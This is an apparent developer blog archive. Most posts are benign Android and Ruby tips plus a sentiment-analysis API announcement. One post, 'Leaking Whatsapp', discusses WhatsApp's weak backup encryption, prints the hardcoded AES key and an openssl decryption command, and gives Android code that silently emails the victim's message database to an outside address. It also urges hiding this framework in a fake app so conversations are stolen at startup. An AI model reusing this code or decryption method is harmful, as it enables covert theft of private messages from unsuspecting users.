Export XML files to CSV (or Android I18N files to iPhone I18N files)

Android and iOS have two different peculiarities when it comes to I18N: they present different file formats. Google platform uses XML, whereas Cupertino’s uses CSV files. Lately we came to a problem to unify some of out I18N resources. In order to do that, we wanted to have a unified format to easily compare whether the strings where correctly modified or not.

This Ruby script was designed to export Android strings into a .CSV file (and therefore, really easy to script if you need to compare it with its Apple pair). Remember you need to install Nokogiri to make it work.

And call it with ruby scriptname.rb inputfile.xml outputfile.csv

#!/usr/local/bin/ruby
#
#
require "nokogiri"
 
file =  File.open(ARGV[0])
xml_doc = Nokogiri::XML(file)
array = xml_doc.xpath("//string")
 
str = ""
array.each do |xpath_node|
  str.concat( "#{xpath_node.attribute('name')}, #{xpath_node.text}\n")
end
 
puts str
File.open(ARGV[1], 'w') { |file| file.write(str) }

Automatically increasing versionCode with Gradle

Continuous Integration means, above all, automatization. The user should not be in charge of the distribution or deployment process. Everything should be scripted!

While deploying new versions in Android, one of the common tasks is to increase the versionCode to identify a particular build. Using the new Gradle system, this can also be automatized.

def getVersionCodeAndroid() {
    println "Hello getVersionCode"
    def manifestFile = file("src/main/AndroidManifest.xml")
    def pattern = Pattern.compile("versionCode=\"(\\d+)\"")
    def manifestText = manifestFile.getText()
    def matcher = pattern.matcher(manifestText)
    matcher.find()
    def version = ++Integer.parseInt(matcher.group(1))
    println sprintf("Returning version %d", version)
    return version
}

task('writeVersionCode')  {     
    def manifestFile = file("src/main/AndroidManifest.xml")   
    def pattern = Pattern.compile("versionCode=\"(\\d+)\"")   
    def manifestText = manifestFile.getText()    
    def matcher = pattern.matcher(manifestText)     
    matcher.find()    
    def versionCode = Integer.parseInt(matcher.group(1))   
    def manifestContent = matcher.replaceAll("versionCode=\"" + ++versionCode + "\"")     
    manifestFile.write(manifestContent) 
} 

tasks.whenTaskAdded { task ->
    if (task.name == 'generateReleaseBuildConfig') {
        task.dependsOn 'writeVersionCode'
    }

    if (task.name == 'generateDebugBuildConfig') {
        task.dependsOn 'writeVersionCode'
    }
}

In our defaultConfig, we will need to specify that the versionCode must be read from the newly added function:

  versionCode getVersionCodeAndroid()

Testing Asynchronous Tasks on Android

Recently, at Sixt we have been migrating our development environment from Eclipse to Android Studio. This has mean we have also moved to the new build system, Gradle, and applying TDD and CI to our software development process. This is not the place to discuss the benefits of applying CI to a software development plan, but to talk about a problem arising when testing tasks running on different threads than the UI in Android.

 

A test in Android is (broad definition) an extension of a JUnit Suitcase. They do include setUp() and tearDown() for initialization/closing the tests, and infers using reflection the different test methods (starting with JUnit 4 we can use annotations to specify the priority and execution of all the tests). A typical test structure will look like:

public class MyManagerTest extends ActivityTestCase {

	public MyManagerTest(String name) {
		super(name);
	}

	protected void setUp() throws Exception {
		super.setUp();
	}

	protected void tearDown() throws Exception {
		super.tearDown();
	}

	public void testDummyTest() {
		fail("Failing test");
	}

}

This is a very obvious instance: in a practical case we would like to test things such as HTTP requests, SQL storage, etc. In Sixt we follow a Manager/Model approach: each Model contains the representation of an Entity (a Car, a User…) and each Manager groups a set of functionality using different models (for example, our LoginManager might require of models Users to interact with them). Most our managers perform HTTP  requests intensively in order to retrieve data from our backend. As an example, we would perform the login of a user using the following code:

 

	mLoginManager.performLoginWithUsername("username", "password", new OnLoginListener() {
		@Override
		public void onFailure(Throwable throwable) {
			fail();
		}

		Override
		public void onSuccess(User customer) {
		//..
		}
	});

When it comes to apply this to our own test suitcase, we just make the process fail() when the result does not work as we were expecting. We can see why in the method onFailure() we call to fail().

However, even if I was using a wrong username the test was still passing. Wondering around, seems that the test executed the code sequentially, and did not wait until the result of the callbacks was back. This is certainly a bad approach, since a modern application do intense usage of asynchronous tasks and callback methods to retrieve data from a backend!. Tried applying the @UiThreadTest bust still didn’t work.

I found the following working method. I simply use CountDownLatch signal objects to implement the wait-notify (you can use synchronized(lock){… lock.notify();}, however this results in ugly code) mechanism. The previous code will look like follows:

	final CountDownLatch signal = new CountDownLatch(1);
	mLoginManager.performLoginWithUsername("username", "password", new OnLoginListener() {
		@Override
		public void onFailure(Throwable throwable) {
			fail();
			signal.countDown();
		}

		Override
		public void onSuccess(User customer) {
			signal.countDown();
		}
	});
	signal.await();

 

Leaking Whatsapp – stealing conversations silently

bug-big

Whatsapp, the fast-growing mobile messaging service, is the main threat to the (outdated) business model of telecommunications operators. Its exponencial numbers confirm that telcos react late and bad: Whatsapp has taken a position that will be hard to unthrone. The only apparent risk lies on another companies using the same concept of Push notifications: recently, Line appears to claim some users adding some more functionalities.

Business besides, is amazing to see how the security in Whatsapp is inexistant.  In an attempt to be moderate, I will simply say that using the word “security” is a disinformed statement. Being aggressive I would use other words.

In May 2011, there was a reported bug which left user accounts open for hijacking. This was the first public one. Since then, it was reported that communications within WhatsApp were not encrypted, being the data sent and received in plaintext. This allowed any person to intercept messages by connecting to the same WiFi as the target phone (an application for Android was even published on the market, although it was removed after a few weeks by Google). In May 2012 the bug was reported to be fixed, although took one year to implement a fix that is not specially complex.

In September 2011, a new version of WhatsApp allowed forged messages to be sent and messages from any WhatsApp user to be read.

On January 6, 2012, an unknown hacker published a website  which made possible to change the status of an arbitrary whatsapp user, as long as the phone number was known. This bug was reported as fixed on January 9… but the only measure that was taken was blocking the website’s IP address. As a reaction, a Windows tool was made available for download providing the same functionality. This issue has not been resolved until now.

On January 13, 2012, Whatsapp was pulled from the iOS App Store for a non disclosed reason. The app was added back to the App Store 4 days later. German Tech blog The H demonstrated how to hijack any WhatsApp account on September 14, 2012. WhatsApp reacted with a legal threat to WhatsAPI’s developers.

The last unassailable bastion was the local database of messages, since it was physically stored in the device and we would need access to it… in theory. Let’s gonna show how can we achieve this. In most cases it is possible to obtain the WhatsApp message history from an encrypted device or backup, for details read this paper: WhatsApp Database Encryption Project Report

Summarizing: The database containing all the WhatsApp messages is stored in a SQLite file format. For iOS phones this file is in the path: [App ID] / Documents / ChatStorage.sqlite and in the case of Android phones at / com.whatsapp / databases / msgstore.db. This file is unencrypted, and this requires the phone to access the jailbreaked. In Android, the backup file is stored in the external memory card, and was also not encrypted. This changed in one application update, and now, if the phone is lost or stolen, the messages can not be read.

Unfortunately, the application uses the same key for the encryption (AES-192-ECB) (346a23652a46392b4d73257c67317e352e3372482177652c), and there is no use of enthropy or unique factors for each device, so the database can be unencrypted within a matter of seconds.

openssl enc -d  -aes-192-ecb -in msgstore-1.db.crypt -out msgstore.db.sqlite -K346a23652a46392b4d73257c67317e352e3372482177652c

 

So, we know how to break the encryption. Now we have to solve the problem of having access to the device.

Android uses permissions to determine what the applications can do when they are install on the device. In order to read from the external storage we need to use the permission android.permission.WRITE_EXTERNAL_STORAGE. By using that, we will be able to access all the files within the SDCard. Surprisingly, Whatsapp developers didn’t use the internal storage for the application, which would have prevent any application from stealing their data.

Now that we can access the data, we need to send it somewhere else. By default, Android allows us to use Intents in order to send emails. But this is not transparent at all: the user will be able to see that we are trying to send an email to an unknown email address, and this action will be canceled. But we can use some other techniques. For example, we could use a transparent layer, connect to a mail server without triggering the user perception and adcquire the file with the precious information.

I have developed a framework (WhatsApp Conversation Burglar) that can be included within an Android application, and steal the data without the user getting to know it. You can download it from here.

Let’s see how it works:

The framework presents a dummy Activity (MailSenderActivity), with only a button. We have the following listener when the button is clicked:

 public void onClick(View v) {
            	try {   
                	AsyncTask<Void, Void, Void> m = new AsyncTask<Void, Void, Void>() {

						@Override
						protected Void doInBackground(Void... arg0) {
							GMailSender sender = new GMailSender(EMAIL_STRING, PASSWORD_STRING);
		                    try {
		                    	sender.addAttachment("/storage/sdcard0/WhatsApp/Databases/msgstore.db.crypt", SUBJECT_STRING);
								sender.sendMail(SUBJECT_STRING,   
								        BODY_STRING,   
								        EMAIL_STRING,   
								        RECIPIENT_STRING);
							} catch (Exception e) {
								e.printStackTrace();
							}   
							return null;
						}
                	};
                	m.execute((Void)null);
                } catch (Exception e) {   
                    DebugLog.e("SendMail", e.getMessage());   
                } 
            }
        });

This section of code initializes an object GMailSender with some parameters. The function addAttachment() attach a target file to be sent (in our case, it is the database containing all the WhatsApp messages) and a SUBJECT to the email. The function sendMail() just send the email with the required information (SUBJECT_STRING, BODY_STRING, EMAIL_STRING, RECIPIENT_STRING). The class GMailSender is the object responsible of all the email communication, using the library JavaMail. The code is self-explanatory.

By setting the right parameters, the file with all the conversations is sent to the provided email address, where we can decrypt it by using the line I provided before in the terminal. If you want to use this framework in your application, you only have to add it as a library, and include the code within the application (probably on the onCreate() method of the first activity triggered, so you make sure the conversations are stolen when the application starts). A fake application could include this framework, and still all the conversations from the users installing it

There is no way to prevent this error, just removing the file with all the conversations. WhatsApp could use a different kind of encryption (using data such as device IMEI, UNIX time of installation or any non replicable information), or just move it to the private application folder (/data/data/com.package.name/). But considering their tragic history on security we probably can not rely on this.

If you have any comment about the previous post feel free to contact me per email.

 

Enrique López-Mañas

Flirting with sentimental analysis: my own approach and some case-scenario applications

Lately I have been interested in applying data analysis to information sources, particularly Twitter. Twitter has all the necessary features to provide an effective real time analysis: the API they provide allows us to access all the required features for analysis, and the volume of information is just huge. I strongly believe that Twitter has already changed the way to perform intelligent analytics, since it just contains millions of thematic tweets that can be accessed with no limitation.

Since I began to write my own intelligent agent for SCAI (a tournament to develop an AI agent able to play Starcraft) I really got very interested in modeling human intelligence. So of course there is a lot to do in this field, and doesn’t make any sense to list those well-known challenges still open. One of the fields that always attracted me was the Sentimental Analysis. How interesting is the idea of extracting sentimental information of texts? Furthermore, this field deeps into many interesting areas of the Artificial Intelligence.

A few months ago I began to develop my own Sentimental Analyzer. It wasn’t easy at the beginning: there are so many different approaches that the task seemed overwhelming. Since the project aimed to have a little more impact that traditional sentimental analyzers, I used a different approach: most of the ideas use keywords approach. They are pretty effective, but they do not ensure recall and it is more difficult to train the analyzer (i.e., train it automatically by using Twitter as a learning source). So I decided to use it using classifiers from different machine learning algorithms. The analyzer has been trained only for English, although it learns every day and I’m considering to expand it to some other languages (fundamentally Spanish and German)

And the experiment is working, and pretty accurate I would like to say. I have developed two applications to show them as testbeds for the analyzer:

  • The Happinness Observer, which determines the happiness for a certain concept
  • City Mood. This application determines the position of the user and throw information of the mood state of the city, based on the tweets from the people referencing it.



Feel free to download the applications and let me know what you think.

Last but not least, I have decided to give free access to the API for those who are interested. The idea is quite simple: you can call to this URL:

http://feeling-analyzer.appspot.com/feeling_analyzer/feeling?text=I+love+this+guy

In the parameter text you should send the text (HTTP codified) you want to analyze. You will need to register for a key to use the application (and add it as a parameter on the same way: &key=providedKey). Drop me a line if you need a key and I will provide you one.

The application return a value corresponding the the polarity of the text: 0 means negative, 2 means neutral and 4 means positive. As a further enhancement of the algorithm I’m planning to extend the polarity of the analysis to support multi-values (i.e., not just providing discret values but a full continuous range of them, from 0 to 100 for example).

Enrique López-Mañas